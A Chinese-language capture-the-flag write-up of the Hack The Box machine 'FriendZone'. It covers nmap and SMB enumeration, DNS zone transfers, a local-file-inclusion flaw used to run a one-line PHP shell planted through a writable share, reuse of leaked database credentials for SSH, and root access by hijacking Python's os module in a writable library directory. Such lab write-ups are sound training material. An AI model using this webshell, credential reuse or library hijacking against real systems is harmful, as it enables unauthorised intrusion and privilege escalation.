HTB-linux-FriendZone

简介：
靶机非CMS系统, 通过DNS漏洞、LFI和Hijacking可拿下靶机。在完成靶机的过程中有三个卡点, 后续将进行总结。

靶机状态: 已完成

目录

• SMB
• Zone_Transfer
• LFI
• Hajicking

SMB

nmap

用nmap扫描机器的IP地址，发现开放的端口及对应的服务

# Nmap 7.70 scan initiated Sat May 25 23:31:31 2019 as: nmap -sC -sV -oA FriendZone 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.27s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
| tls-alpn:
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -59m46s, deviation: 1h43m51s, median: 10s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2019-05-25T18:32:12+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-05-25 23:32:06
|_  start_date: N/A

ftp

尝试ftp匿名登陆失败

etbios-ssn Samba

smbmap、smbclient查看匿名登陆samba服务，从中搜索文件中的敏感信息

root@kali:~# smbmap -u guest -H 10.10.10.123
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.123...
[+] IP: 10.10.10.123:445	Name: 10.10.10.123
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	Files                                             	NO ACCESS
	general                                           	READ ONLY
	Development                                       	READ, WRITE
	IPC$                                              	NO ACCESS

root@kali:~# cat creds.txt
creds for the admin THING:

admin:WORKWORKHhallelujah@#

Zone_Transfer

机器开放53(DNS)端口, 所以尝试搜集DNS中的信息

dig

这里有一个很坑的地方, 第一此根据WEB页面中的friendzoneportal.red邮箱后缀, 于是用dig查friendzoneportal.red的子域; 一直无法找到突破口, 后来在一份wp上看到需要查friendzone.red的子域; 但暂不清楚具体的原因。查找所有的子域名后, 找到可用的子域名administrator1.friendzone.red.

root@kali:~# dig axfr friendzoneportal.red @FriendZone.htb

; <<>> DiG 9.11.5-P4-3-Debian <<>> axfr friendzoneportal.red @FriendZone.htb
;; global options: +cmd
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.	604800	IN	AAAA	::1
friendzoneportal.red.	604800	IN	NS	localhost.
friendzoneportal.red.	604800	IN	A	127.0.0.1
admin.friendzoneportal.red. 604800 IN	A	127.0.0.1
files.friendzoneportal.red. 604800 IN	A	127.0.0.1
imports.friendzoneportal.red. 604800 IN	A	127.0.0.1
vpn.friendzoneportal.red. 604800 IN	A	127.0.0.1
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 252 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Sat Jun 01 03:31:49 EDT 2019
;; XFR size: 9 records (messages 1, bytes 309)

# 查看wp后继续进行
➜  ~ dig axfr friendzone.red @FriendZone.htb

; <<>> DiG 9.10.6 <<>> axfr friendzone.red @FriendZone.htb
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 234 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Jun 20 11:12:25 CST 2019
;; XFR size: 8 records (messages 1, bytes 261)

发现域名friendzoneportal.red.、admin.friendzoneportal.red.、files.friendzoneportal.red.、imports.friendzoneportal.red.、vpn.friendzoneportal.red.、friendzone.red、administrator1.friendzone.red.、hr.friendzone.red.、uploads.friendzone.red., 共9个

LFI

访问administrator1.friendzone.red站点, 输入从SMB共享中找到的账号密码, 发现一处LFI: , 通过SMB共享在Development目录中写入webshell即可获得反弹webshell,

<?php
  system("/bin/sh -");
?>

拿到webshell后, 成功读取user.txt

Hajicking

通过webshell后在网站目录中找到mysql数据库的账号密码:

mysql_data.conf:
  db_user=friend
  db_pass=Agpyu12!0.213$
  db_name=FZ

用账号密码登陆ssh服务, 通过LinEnum.sh查找可利用弱点未果, 用pspy64查找系统中隐藏的内容时发现两个有意思的地方, 新用户登录时, 会用root权限设置环境变量并用相对路径执行cut命令; 机器会定时用root权限执行一次/usr/bin/python /opt/server_admin/reporter.py; 有了这两个内容后，可以考虑Hajicking cut、python的包或者修改/opt/server_admin/reporter.py文件提权;
通过find / -type d -writable 2>/dev/null查看可写目录, 发现PATH中的目录不可写, 但/usr/lib/python2.7目录可写, 因此Hajicking cut这条路不通, 考虑python； 最后通过Hajicking python的os包实现了提权.

friend@FriendZone:/tmp$ cat owef.txt
b0e6c60b8*********656a9e90c7

卡点

卡点1: dig查域传送时, 忽略了friendzone.red子域, 但是为什么会查这个子域呢？可能猜测这块是我最不擅长的地方吧, 没想到查这个地方, 导致一直无法找到HAHA page。
卡点2: 找到HAHA page后，需要通过LFI加载php文件, 但是一致无法找到有效目录, 后来用nmap自带的enum模块扫了一下smb端口才发现, 原来nmap枚举可以显示出共享文件对应的物理文件路径;
卡点3: python Hajicking, 初次遇到.

参考文章

dig